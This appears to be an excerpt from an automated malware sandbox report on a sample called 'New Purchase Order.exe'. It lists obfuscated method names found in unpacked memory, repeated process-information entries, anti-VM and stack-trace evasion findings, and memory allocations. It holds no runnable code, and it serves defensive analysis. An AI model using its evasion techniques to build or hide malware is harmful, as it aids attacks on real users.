                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, qJLvinebBxISnykLbR.csHigh entropy of concatenated method names: 'BnQqP0O3SH', 'lVSqS8k7As', 'Oheqkju39M', 'sWVqYiEYvM', 'tVHqpFjcZX', 'O1iqEYwjRr', 'GqjqTvg0Dr', 'V8Zq6gfsXr', 'mbkqHENsfU', 'PVHqKOhR6y'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, HvOXG3Ecb9WHxnMt83.csHigh entropy of concatenated method names: 'zBrh2fCfc6', 'ujghAvTW0n', 'IBkhi64Awi', 'XTfh8dga4l', 'LcahUqpZwO', 'tYfhZH8ueu', 'Do2hsI0BOn', 'VeyhfCgpo3', 'Mn2hJ6jHs6', 'NOJhjiEQEV'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, ARFY7aJ4w95USnOhEH.csHigh entropy of concatenated method names: 'Dispose', 'AElmHo5e3l', 'H0sa888WQb', 'OxbcpfcuJU', 'SdhmKLtol7', 'uVwmzq2cT7', 'ProcessDialogKey', 'AyZaoO8FdJ', 'ce0am4nd2a', 'zWWaaDJWZ1'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, Gc3jjeWwGSVKABX6Om.csHigh entropy of concatenated method names: 'YjHnCwNpyn', 'AksntJTbKa', 'KDen5pWv3o', 'aK4nL98Bbo', 'vgvnvgrIY0', 'qfyngBlHrB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, x9KwdfT83fQ1H75NjQ.csHigh entropy of concatenated method names: 'byvF1LUJ0D', 'qfUF9ok5Xw', 'YxHFqlwGBI', 'swDFCoeAt6', 'fASFtDr4K2', 'pC6F5R4lxC', 'bTaFLa29yB', 'hMjFgyOHeM', 'OtuFrBBHqO', 'nOdFBnlA0A'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, i1dJkMNKchLyGeCdJgf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XLYnjk2QH9', 'SnPnuw2N8f', 'vtTnlJS5ah', 'kNOnPV6a0J', 't39nSlBGsK', 'Jt9nkWEPmh', 'Tt8nYbgheY'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, WmYmHENZyiGT0eMgOOs.csHigh entropy of concatenated method names: 'ToString', 'lPhb2GDtj3', 'xRYbAUeJgO', 'KNAbyZl73J', 'xpZbiVVfG6', 'N5mb8e24jT', 'jlSb3TaAca', 'KPMbUyoQI9', 'UfOvq8ZLJo1ZxdQbuxT', 'lDoSRmZ7kUdaqW1c45V'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, eUS8jiZ7pjHcURfoBY.csHigh entropy of concatenated method names: 'mThWcDjII', 'lSPwOcInq', 's0FRPwic8', 'O5Y4hEIJh', 'T4bAP3IQZ', 'V65ynhK33', 'bWgN7pMPFpkscOoS2I', 'JN7UAd06KDTVID4U26', 'Feixlj10W', 'c6EnIVW6c'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, qBso1MOw31GWhUC20M.csHigh entropy of concatenated method names: 'rnT51DynCd', 'dN85q51REC', 'lIM5txrZfE', 'wcx5LCl6p6', 'fx95gcA25T', 'eX3tprjgAi', 'v7EtEsc9LL', 'QK7tThunTe', 'qujt6CTdCb', 'qLPtHAsQI3'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, uweqMCf0DYL2rcC882.csHigh entropy of concatenated method names: 'gpx7BhhnTQ', 'kBB7eCDqgq', 'ToString', 'zre79f9r76', 'Ti37q0fNEA', 'Ia57CMlFDa', 'dhR7tTyLkp', 'JI175GgoyD', 'xnB7L18W4T', 'UDe7gRWot2'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, ElvdeJI60fGkFAveCY.csHigh entropy of concatenated method names: 'hqcvD1HUdH', 'okjv7IpSJ5', 'ybXvvDdWJK', 'AJevbWpoRj', 'WTWv0Nyybe', 'aC7vQrgJ4N', 'Dispose', 'lJfx9TH2Gt', 'BKNxqQ1HCO', 'xuQxCcqEev'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, BQb46HyRu1p84y2ymB.csHigh entropy of concatenated method names: 'o74DJ3Oucs', 'dEsDugePmc', 'nTlDPQIMwg', 'LllDStDxsi', 'M6UD8HxNwa', 'ySID36aQUO', 'QKpDUhWPGt', 'SQxDZl7Wgo', 'bmBDMF5E2n', 'pisDsIJANP'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, EQ36o52QR78S2TY0Nr.csHigh entropy of concatenated method names: 'QNHLVMqr7H', 'r45LN6U3cX', 'aSyLWqD862', 'D40LwLNcqI', 'wP3LdUlOSt', 'P4qLRbduj5', 'IijL4l4XwX', 'qxZL2HOVlc', 'MvELAGN84C', 'pBeLyZK92l'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, sWMmMCzjFcaHdo9GIV.csHigh entropy of concatenated method names: 'XPanRIjpfE', 'I4tn23yUnq', 'tbPnAyUmNq', 'B9cnigFeky', 'l2vn804T4a', 'hU0nUsvAac', 'cD1nZJ0pPV', 'ifHnQSo4FM', 'pDdnVuVjo3', 'Rk5nNIiQYh'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, DkYhVYHL5JxUdqiDtq.csHigh entropy of concatenated method names: 'fnJCw4dSTB', 'wX7CRLSb3E', 'Gd2C2sh7Dy', 'TTxCAIM89D', 'sg0CDhp3UN', 'HQMCIXvZ2D', 'MHOC7UhBgi', 'D5oCx5e8QV', 'cqBCvMrINy', 'Vp0CnJsX9q'
                Source: 0.2.New Purchase Order.exe.444fe50.3.raw.unpack, zdnbOrNNHt6v851ld1o.csHigh entropy of concatenated method names: 'wS1nKGV2CW', 'xM3nzRNkec', 'L1nbowVAMB', 'h2pbmKo6uE', 'ia4baeGS7c', 'xQMbFwEaso', 'iSabGjOYBP', 'Q9pb1WpaZy', 'nFfb9YhVkx', 'JZQbq3Dl0T'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, Mw4V8KhpS2G0JUgxuV.csHigh entropy of concatenated method names: 'ToString', 'B4vIjhU2Tw', 'M1lI8gGtPA', 'hGFI3vGNvE', 'kuKIUc1EQc', 'T7sIZSPYda', 'c9mIM4WuYW', 'MTPIsi8ImO', 'gogIfnkWQH', 'SCbIOcLTgQ'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, UnLOGLACcMYAxbpnNq.csHigh entropy of concatenated method names: 'QbBvip4nnG', 'upSv848CRA', 'PYhv3HgH7L', 'YgUvULcaqx', 'JDCvZZYllk', 'GJIvMpqmw1', 'QpqvsTFPhr', 'ImWvfZBqAa', 'IOQvOj6e8Y', 'sIbvJrBTOi'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, ID9eoKYmHSYY79KjaI.csHigh entropy of concatenated method names: 'G43760uKNA', 'tWj7KLqmpo', 'jx3xoMmZVa', 'IaUxmSHhIM', 'R8W7jmkQrG', 'NXK7uWFCiK', 'k6g7lxXho5', 'gBa7PSq3rx', 'XtW7SvR86c', 'BEC7kKrMVK'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, btCpwG6WZyE3ZX17TX.csHigh entropy of concatenated method names: 'qnetdWQFE6', 'uO2t42KETm', 'K6lC3Mw4mK', 'oipCUhY45O', 'uVHCZucxXY', 'y3HCM55vIb', 'sbyCsAR4eu', 'prCCfokx9x', 'Vq8COyiAKx', 'AISCJCYJlK'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, r0yIrBonvq7nvwCEQV.csHigh entropy of concatenated method names: 'WQ7mL2uN5L', 'Wt9mgjG6Mq', 'SZUmBiIY8h', 'vidmeeLXWi', 'JkwmDwhYT7', 'kwumI8H51o', 'jDM30GIHFDfChaMpE0', 'W4kwpOQNpXSEW6pvqF', 'uXWmmX7DRW', 'uVHmFeAsYy'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, z8j2I5NvfYZF22kkA5q.csHigh entropy of concatenated method names: 't91bKnroPG', 'QwAbz02UR6', 'QIpcoIVGRL', 'Oe2alnZ3xiJk6cu3LDT', 'rJ5puAZ4W04I3nieLuy', 'tlCONxZMhGtpI8hgTmR', 'aBSgLsZ04jx4VCWE0dM'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, qJLvinebBxISnykLbR.csHigh entropy of concatenated method names: 'BnQqP0O3SH', 'lVSqS8k7As', 'Oheqkju39M', 'sWVqYiEYvM', 'tVHqpFjcZX', 'O1iqEYwjRr', 'GqjqTvg0Dr', 'V8Zq6gfsXr', 'mbkqHENsfU', 'PVHqKOhR6y'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, HvOXG3Ecb9WHxnMt83.csHigh entropy of concatenated method names: 'zBrh2fCfc6', 'ujghAvTW0n', 'IBkhi64Awi', 'XTfh8dga4l', 'LcahUqpZwO', 'tYfhZH8ueu', 'Do2hsI0BOn', 'VeyhfCgpo3', 'Mn2hJ6jHs6', 'NOJhjiEQEV'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, ARFY7aJ4w95USnOhEH.csHigh entropy of concatenated method names: 'Dispose', 'AElmHo5e3l', 'H0sa888WQb', 'OxbcpfcuJU', 'SdhmKLtol7', 'uVwmzq2cT7', 'ProcessDialogKey', 'AyZaoO8FdJ', 'ce0am4nd2a', 'zWWaaDJWZ1'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, Gc3jjeWwGSVKABX6Om.csHigh entropy of concatenated method names: 'YjHnCwNpyn', 'AksntJTbKa', 'KDen5pWv3o', 'aK4nL98Bbo', 'vgvnvgrIY0', 'qfyngBlHrB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, x9KwdfT83fQ1H75NjQ.csHigh entropy of concatenated method names: 'byvF1LUJ0D', 'qfUF9ok5Xw', 'YxHFqlwGBI', 'swDFCoeAt6', 'fASFtDr4K2', 'pC6F5R4lxC', 'bTaFLa29yB', 'hMjFgyOHeM', 'OtuFrBBHqO', 'nOdFBnlA0A'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, i1dJkMNKchLyGeCdJgf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XLYnjk2QH9', 'SnPnuw2N8f', 'vtTnlJS5ah', 'kNOnPV6a0J', 't39nSlBGsK', 'Jt9nkWEPmh', 'Tt8nYbgheY'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, WmYmHENZyiGT0eMgOOs.csHigh entropy of concatenated method names: 'ToString', 'lPhb2GDtj3', 'xRYbAUeJgO', 'KNAbyZl73J', 'xpZbiVVfG6', 'N5mb8e24jT', 'jlSb3TaAca', 'KPMbUyoQI9', 'UfOvq8ZLJo1ZxdQbuxT', 'lDoSRmZ7kUdaqW1c45V'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, eUS8jiZ7pjHcURfoBY.csHigh entropy of concatenated method names: 'mThWcDjII', 'lSPwOcInq', 's0FRPwic8', 'O5Y4hEIJh', 'T4bAP3IQZ', 'V65ynhK33', 'bWgN7pMPFpkscOoS2I', 'JN7UAd06KDTVID4U26', 'Feixlj10W', 'c6EnIVW6c'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, qBso1MOw31GWhUC20M.csHigh entropy of concatenated method names: 'rnT51DynCd', 'dN85q51REC', 'lIM5txrZfE', 'wcx5LCl6p6', 'fx95gcA25T', 'eX3tprjgAi', 'v7EtEsc9LL', 'QK7tThunTe', 'qujt6CTdCb', 'qLPtHAsQI3'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, uweqMCf0DYL2rcC882.csHigh entropy of concatenated method names: 'gpx7BhhnTQ', 'kBB7eCDqgq', 'ToString', 'zre79f9r76', 'Ti37q0fNEA', 'Ia57CMlFDa', 'dhR7tTyLkp', 'JI175GgoyD', 'xnB7L18W4T', 'UDe7gRWot2'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, ElvdeJI60fGkFAveCY.csHigh entropy of concatenated method names: 'hqcvD1HUdH', 'okjv7IpSJ5', 'ybXvvDdWJK', 'AJevbWpoRj', 'WTWv0Nyybe', 'aC7vQrgJ4N', 'Dispose', 'lJfx9TH2Gt', 'BKNxqQ1HCO', 'xuQxCcqEev'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, BQb46HyRu1p84y2ymB.csHigh entropy of concatenated method names: 'o74DJ3Oucs', 'dEsDugePmc', 'nTlDPQIMwg', 'LllDStDxsi', 'M6UD8HxNwa', 'ySID36aQUO', 'QKpDUhWPGt', 'SQxDZl7Wgo', 'bmBDMF5E2n', 'pisDsIJANP'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, EQ36o52QR78S2TY0Nr.csHigh entropy of concatenated method names: 'QNHLVMqr7H', 'r45LN6U3cX', 'aSyLWqD862', 'D40LwLNcqI', 'wP3LdUlOSt', 'P4qLRbduj5', 'IijL4l4XwX', 'qxZL2HOVlc', 'MvELAGN84C', 'pBeLyZK92l'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, sWMmMCzjFcaHdo9GIV.csHigh entropy of concatenated method names: 'XPanRIjpfE', 'I4tn23yUnq', 'tbPnAyUmNq', 'B9cnigFeky', 'l2vn804T4a', 'hU0nUsvAac', 'cD1nZJ0pPV', 'ifHnQSo4FM', 'pDdnVuVjo3', 'Rk5nNIiQYh'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, DkYhVYHL5JxUdqiDtq.csHigh entropy of concatenated method names: 'fnJCw4dSTB', 'wX7CRLSb3E', 'Gd2C2sh7Dy', 'TTxCAIM89D', 'sg0CDhp3UN', 'HQMCIXvZ2D', 'MHOC7UhBgi', 'D5oCx5e8QV', 'cqBCvMrINy', 'Vp0CnJsX9q'
                Source: 0.2.New Purchase Order.exe.9550000.5.raw.unpack, zdnbOrNNHt6v851ld1o.csHigh entropy of concatenated method names: 'wS1nKGV2CW', 'xM3nzRNkec', 'L1nbowVAMB', 'h2pbmKo6uE', 'ia4baeGS7c', 'xQMbFwEaso', 'iSabGjOYBP', 'Q9pb1WpaZy', 'nFfb9YhVkx', 'JZQbq3Dl0T'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, Mw4V8KhpS2G0JUgxuV.csHigh entropy of concatenated method names: 'ToString', 'B4vIjhU2Tw', 'M1lI8gGtPA', 'hGFI3vGNvE', 'kuKIUc1EQc', 'T7sIZSPYda', 'c9mIM4WuYW', 'MTPIsi8ImO', 'gogIfnkWQH', 'SCbIOcLTgQ'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, UnLOGLACcMYAxbpnNq.csHigh entropy of concatenated method names: 'QbBvip4nnG', 'upSv848CRA', 'PYhv3HgH7L', 'YgUvULcaqx', 'JDCvZZYllk', 'GJIvMpqmw1', 'QpqvsTFPhr', 'ImWvfZBqAa', 'IOQvOj6e8Y', 'sIbvJrBTOi'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ID9eoKYmHSYY79KjaI.csHigh entropy of concatenated method names: 'G43760uKNA', 'tWj7KLqmpo', 'jx3xoMmZVa', 'IaUxmSHhIM', 'R8W7jmkQrG', 'NXK7uWFCiK', 'k6g7lxXho5', 'gBa7PSq3rx', 'XtW7SvR86c', 'BEC7kKrMVK'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, btCpwG6WZyE3ZX17TX.csHigh entropy of concatenated method names: 'qnetdWQFE6', 'uO2t42KETm', 'K6lC3Mw4mK', 'oipCUhY45O', 'uVHCZucxXY', 'y3HCM55vIb', 'sbyCsAR4eu', 'prCCfokx9x', 'Vq8COyiAKx', 'AISCJCYJlK'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, r0yIrBonvq7nvwCEQV.csHigh entropy of concatenated method names: 'WQ7mL2uN5L', 'Wt9mgjG6Mq', 'SZUmBiIY8h', 'vidmeeLXWi', 'JkwmDwhYT7', 'kwumI8H51o', 'jDM30GIHFDfChaMpE0', 'W4kwpOQNpXSEW6pvqF', 'uXWmmX7DRW', 'uVHmFeAsYy'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, z8j2I5NvfYZF22kkA5q.csHigh entropy of concatenated method names: 't91bKnroPG', 'QwAbz02UR6', 'QIpcoIVGRL', 'Oe2alnZ3xiJk6cu3LDT', 'rJ5puAZ4W04I3nieLuy', 'tlCONxZMhGtpI8hgTmR', 'aBSgLsZ04jx4VCWE0dM'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qJLvinebBxISnykLbR.csHigh entropy of concatenated method names: 'BnQqP0O3SH', 'lVSqS8k7As', 'Oheqkju39M', 'sWVqYiEYvM', 'tVHqpFjcZX', 'O1iqEYwjRr', 'GqjqTvg0Dr', 'V8Zq6gfsXr', 'mbkqHENsfU', 'PVHqKOhR6y'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, HvOXG3Ecb9WHxnMt83.csHigh entropy of concatenated method names: 'zBrh2fCfc6', 'ujghAvTW0n', 'IBkhi64Awi', 'XTfh8dga4l', 'LcahUqpZwO', 'tYfhZH8ueu', 'Do2hsI0BOn', 'VeyhfCgpo3', 'Mn2hJ6jHs6', 'NOJhjiEQEV'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ARFY7aJ4w95USnOhEH.csHigh entropy of concatenated method names: 'Dispose', 'AElmHo5e3l', 'H0sa888WQb', 'OxbcpfcuJU', 'SdhmKLtol7', 'uVwmzq2cT7', 'ProcessDialogKey', 'AyZaoO8FdJ', 'ce0am4nd2a', 'zWWaaDJWZ1'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, Gc3jjeWwGSVKABX6Om.csHigh entropy of concatenated method names: 'YjHnCwNpyn', 'AksntJTbKa', 'KDen5pWv3o', 'aK4nL98Bbo', 'vgvnvgrIY0', 'qfyngBlHrB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, x9KwdfT83fQ1H75NjQ.csHigh entropy of concatenated method names: 'byvF1LUJ0D', 'qfUF9ok5Xw', 'YxHFqlwGBI', 'swDFCoeAt6', 'fASFtDr4K2', 'pC6F5R4lxC', 'bTaFLa29yB', 'hMjFgyOHeM', 'OtuFrBBHqO', 'nOdFBnlA0A'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, i1dJkMNKchLyGeCdJgf.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XLYnjk2QH9', 'SnPnuw2N8f', 'vtTnlJS5ah', 'kNOnPV6a0J', 't39nSlBGsK', 'Jt9nkWEPmh', 'Tt8nYbgheY'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, WmYmHENZyiGT0eMgOOs.csHigh entropy of concatenated method names: 'ToString', 'lPhb2GDtj3', 'xRYbAUeJgO', 'KNAbyZl73J', 'xpZbiVVfG6', 'N5mb8e24jT', 'jlSb3TaAca', 'KPMbUyoQI9', 'UfOvq8ZLJo1ZxdQbuxT', 'lDoSRmZ7kUdaqW1c45V'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, eUS8jiZ7pjHcURfoBY.csHigh entropy of concatenated method names: 'mThWcDjII', 'lSPwOcInq', 's0FRPwic8', 'O5Y4hEIJh', 'T4bAP3IQZ', 'V65ynhK33', 'bWgN7pMPFpkscOoS2I', 'JN7UAd06KDTVID4U26', 'Feixlj10W', 'c6EnIVW6c'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, qBso1MOw31GWhUC20M.csHigh entropy of concatenated method names: 'rnT51DynCd', 'dN85q51REC', 'lIM5txrZfE', 'wcx5LCl6p6', 'fx95gcA25T', 'eX3tprjgAi', 'v7EtEsc9LL', 'QK7tThunTe', 'qujt6CTdCb', 'qLPtHAsQI3'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, uweqMCf0DYL2rcC882.csHigh entropy of concatenated method names: 'gpx7BhhnTQ', 'kBB7eCDqgq', 'ToString', 'zre79f9r76', 'Ti37q0fNEA', 'Ia57CMlFDa', 'dhR7tTyLkp', 'JI175GgoyD', 'xnB7L18W4T', 'UDe7gRWot2'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, ElvdeJI60fGkFAveCY.csHigh entropy of concatenated method names: 'hqcvD1HUdH', 'okjv7IpSJ5', 'ybXvvDdWJK', 'AJevbWpoRj', 'WTWv0Nyybe', 'aC7vQrgJ4N', 'Dispose', 'lJfx9TH2Gt', 'BKNxqQ1HCO', 'xuQxCcqEev'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, BQb46HyRu1p84y2ymB.csHigh entropy of concatenated method names: 'o74DJ3Oucs', 'dEsDugePmc', 'nTlDPQIMwg', 'LllDStDxsi', 'M6UD8HxNwa', 'ySID36aQUO', 'QKpDUhWPGt', 'SQxDZl7Wgo', 'bmBDMF5E2n', 'pisDsIJANP'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, EQ36o52QR78S2TY0Nr.csHigh entropy of concatenated method names: 'QNHLVMqr7H', 'r45LN6U3cX', 'aSyLWqD862', 'D40LwLNcqI', 'wP3LdUlOSt', 'P4qLRbduj5', 'IijL4l4XwX', 'qxZL2HOVlc', 'MvELAGN84C', 'pBeLyZK92l'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, sWMmMCzjFcaHdo9GIV.csHigh entropy of concatenated method names: 'XPanRIjpfE', 'I4tn23yUnq', 'tbPnAyUmNq', 'B9cnigFeky', 'l2vn804T4a', 'hU0nUsvAac', 'cD1nZJ0pPV', 'ifHnQSo4FM', 'pDdnVuVjo3', 'Rk5nNIiQYh'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, DkYhVYHL5JxUdqiDtq.csHigh entropy of concatenated method names: 'fnJCw4dSTB', 'wX7CRLSb3E', 'Gd2C2sh7Dy', 'TTxCAIM89D', 'sg0CDhp3UN', 'HQMCIXvZ2D', 'MHOC7UhBgi', 'D5oCx5e8QV', 'cqBCvMrINy', 'Vp0CnJsX9q'
                Source: 0.2.New Purchase Order.exe.44da670.2.raw.unpack, zdnbOrNNHt6v851ld1o.csHigh entropy of concatenated method names: 'wS1nKGV2CW', 'xM3nzRNkec', 'L1nbowVAMB', 'h2pbmKo6uE', 'ia4baeGS7c', 'xQMbFwEaso', 'iSabGjOYBP', 'Q9pb1WpaZy', 'nFfb9YhVkx', 'JZQbq3Dl0T'
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: New Purchase Order.exe PID: 7668, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 29D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 4EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 5EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: AC20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: B0B0000 memory reserve | memory write watchJump to behavior
